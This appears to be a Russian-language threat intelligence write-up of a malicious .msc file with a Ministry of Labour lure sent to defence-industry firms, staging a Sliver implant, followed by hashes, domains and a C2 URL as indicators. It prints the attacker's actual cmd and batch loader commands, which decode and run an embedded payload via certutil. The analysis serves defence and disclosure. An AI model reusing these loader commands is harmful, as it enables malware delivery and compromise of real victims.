20 сентября специалисты F.A.C.C.T. Threat Intelligence обнаружили вредоносный файл «17_09_2024.msc», в процессе выполнения которого жертве демонстрировался интересный документ-приманка. Речь о письме Минтруда РФ директорам предприятий оборонно-промышленного комплекса. Изучая приманку, специалисты предположили, что за атакой с использованием этого файла стоит группа кибершпионов Sticky Werewolf — весной этого года они уже использовали похожий документ. Однако совокупность TTP и инфраструктурные особенности указывали на то, что первоначальная гипотеза могла быть ошибочной, а на самом деле за атакой стоит совершенно другой злоумышленник. В настоящий момент эксперты F.A.C.C.T. отслеживают эту активность под именем MimiStick. Подробностями поделились Артем Грищенко, ведущий специалист по анализу вредоносного кода, F.A.C.C.T., и Алена Шандер, аналитик группы исследования сложных угроз, F.A.C.C.T.
При открытии файла 17_09_2024.msc запускаются следующие команды:
"C:\Windows\System32\cmd.exe" /v /c set "k=%cd%\17_09_2024.msc"&(IF NOT EXIST "!k!" (for /f "tokens=* usebackq" %g in (`where /R "%userprofile%" "17_09_2024.ms"?`) do set "k=%g")>nul 2>&1)&set "f=r"&set "o=%localappdata%"&>nul ce!f!tutil -decode """!k!""" !o!\xrks.t&ren "!o!\xrks.t" xrks.cmD&!o!\xrks
where /R "C:\Users\admin" "17_09_2024.ms"?
certutil -decode """C:\Users\admin\AppData\Local\Temp\17_09_2024.msc""" C:\Users\admin\AppData\Local\xrks.t
С помощью этих команд будет извлекаться упакованное содержимое файла «17_09_2024.msc». После распаковки будет создан файл %localappdata%\xrks.t с командным файлом внутри. Его содержимое следующее:
@echo off
SET "go=%~f0"
set h=r
set "td=%temp%"
echo T > "%td%\th.txt"
findstr /b /l "VqQAAMAAAAEAAAA//8AALgAA" "%go%" >> "%td%\th.txt"
>nul ce%h%tutil.exe -decode "%td%\th.txt" "%td%\xkiq.txt"
ren "%td%\xkiq.txt" wqhe.exe
del "%td%\th.txt"
start /b "" "%td%\wqhe.exe"
exit /b 0
VqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAA[REDACTED]...
Далее выполняются 2 команды:
findstr /b /l "VqQAAMAAAAEAAAA//8AALgAA" "C:\Users\admin\AppData\Local\xrks.cmD"
certutil.exe -decode "C:\Users\admin\AppData\Local\Temp\th.txt" "C:\Users\admin\AppData\Local\Temp\xkiq.txt"
Они нужны для того, чтобы обнаружить содержащуюся в конце bat-файла упакованную нагрузку. Нагрузка — это base64-строка, начинающаяся с подстроки «VqQAAMAAAAEAAAA//8AALgAA». Нагрузка декодируется и сохраняется в файл %Temp%\xkiq.txt.
Затем она переименовывается в %Temp%\wqhe.exe, удаляется исходный файл th.txt, а файл wqhe.exe запускается.
Нагрузка содержит в ресурсах PDF-приманку, которая после запуска файла сохраняется в %Temp%\17_09_2024_0.pdf и открывается. Содержимое приманки приведено на рисунке ниже.
Схожие приманки мы наблюдали в ряде атак группы Sticky Werewolf, например, приманка из атаки группы Sticky Werewolf от марта 2024 года приведена на рисунке ниже:
После открытия приманки нагрузка запускает содержащийся в себе зашифрованный шеллкод.
Нагрузка — стэйджер, который загружает и запускает вторую стадию с удаленного узла. В качестве второй стадии используется Sliver implant c С2: techitzone[.]ru:443.
Домен techitzone[.]ru зарегистрирован 2 сентября 2024 года.
![Рис. 3. Информация о регистрации домена techitzone[.]ru](https://habrastorage.org/getpro/habr/upload_files/a54/891/702/a548917029cdc0e14d66ffd86ab8c9af.png "Рис. 3. Информация о регистрации домена techitzone[.]ru")
С этим доменом связаны несколько дополнительных, которые были зарегистрированы тем же атакующим и, вероятно, уже использовались или будут использоваться им в ближайшее время:
-
about-tech[.]ru – зарегистрирован 2023-12-07
-
orkprank[.]ru — зарегистрирован 2024-06-18
-
borosan[.]ru – зарегистрирован 2024-07-15
-
mysafer[.]ru – зарегистрирован 2024-07-05
-
rtxcore[.]ru — зарегистрирован 2024-09-02
-
min-trud-gov[.]ru – зарегистрирован 2024-09-23
Домен min-trud-gov[.]ru, мимикрирующий под домен Минтруда России, вызывает особый интерес, поскольку был зарегистрирован относительно недавно и совпадает по легенде с приманкой из сентябрьской атаки группы, обнаруженной в ходе этого исследования. Высока вероятность, что он будет использоваться злоумышленниками в ближайшее время для проведения фишинговых рассылок.
Индикаторы компрометации
Файловые индикаторы
|
Filename |
17_09_2024.msc |
|
MD5 |
0756de02dd3b4be840d31c8871148f7f |
|
SHA-1 |
3100e869b1052dee920f7f2ca35da60abdf5aac0 |
|
SHA-256 |
5ad093aa3eaf2bb76003f8f2f9de9b1368640aa320fa8d77df2c773f75186a71 |
|
Filename |
17_09_2024.pdf (приманка) |
|
MD5 |
873454911a81a6c892838c44cbb3059b |
|
SHA-1 |
3fba74f0f7f91f665ad68db9004f1fec3486595b |
|
SHA-256 |
3877f9fd6b21ee735130421dcf997cf000ae66b20a1c6a490f23431b2f95fa90 |
|
Filename |
xkiq.txt |
|
MD5 |
7e151444c98ef2cf084eed8e6d4be807 |
|
SHA-1 |
2849ad434d55b8f2bc067c37903b5ff5bad01dbd |
|
SHA-256 |
65096aa2895025d94b934eb4198ea160e067e8e5c97d9ea252cb2de3870b7b2f |
|
Filename |
xrks.t |
|
MD5 |
5ed144351c41eb690d86c523690eb265 |
|
SHA-1 |
efd81a26fd43124d435bc0223c5f42839f793d42 |
|
SHA-256 |
8d83a598aa61a3f2e61bfdcdfc7b29b4c8d357eb43562d349053defa1ce50d78 |
|
Filename |
stage2.exe |
|
MD5 |
725e5068bd68c3d055f3a814f402a8be |
|
SHA-1 |
e8ba03b13f9b51abcc9a539d09f98b61b2b4ccd0 |
|
SHA-256 |
ff16334c4cbbfed4bfca23436493397d0465c643cce6cbe41426067bb1ce14ff |
|
Filename |
1.7z |
|
MD5 |
67aa63c4518a3604e37f89ad0d39a34d |
|
SHA-1 |
c15716d127961eb1ca4c4d6192af6e1c5c8a2d8d |
|
SHA-256 |
b262dd5373213c5af573a08b409f8142c7f9f92b19536d7d78b4515d23452321 |
Сетевые индикаторы
-
techitzone[.]ru
-
213.183.54[.]123
-
hxxps://213.183.54[.]123:8444/Inter-Regular.woff/-EEbEJB0DX9DBUIHJe0hJQOEOEKOlr-p4xEk6WSSs0tUfsCIdSqYB23qz_Pr_6TmAmEDhpyem74y-_Jv0fO3T12fkp7BqWUKHCqkECIyYA1OqhGzh9QFriVKGM0n3jnnc1Zqenuj-d2nDXL4aUmKRBO7jRdvO6BBXfxw4S
-
about-tech[.]ru
-
orkprank[.]ru
-
borosan[.]ru
-
mysafer[.]ru
-
rtxcore[.]ru
-
min-trud-gov[.]ru
ссылка на оригинал статьи https://habr.com/ru/articles/845766/
Добавить комментарий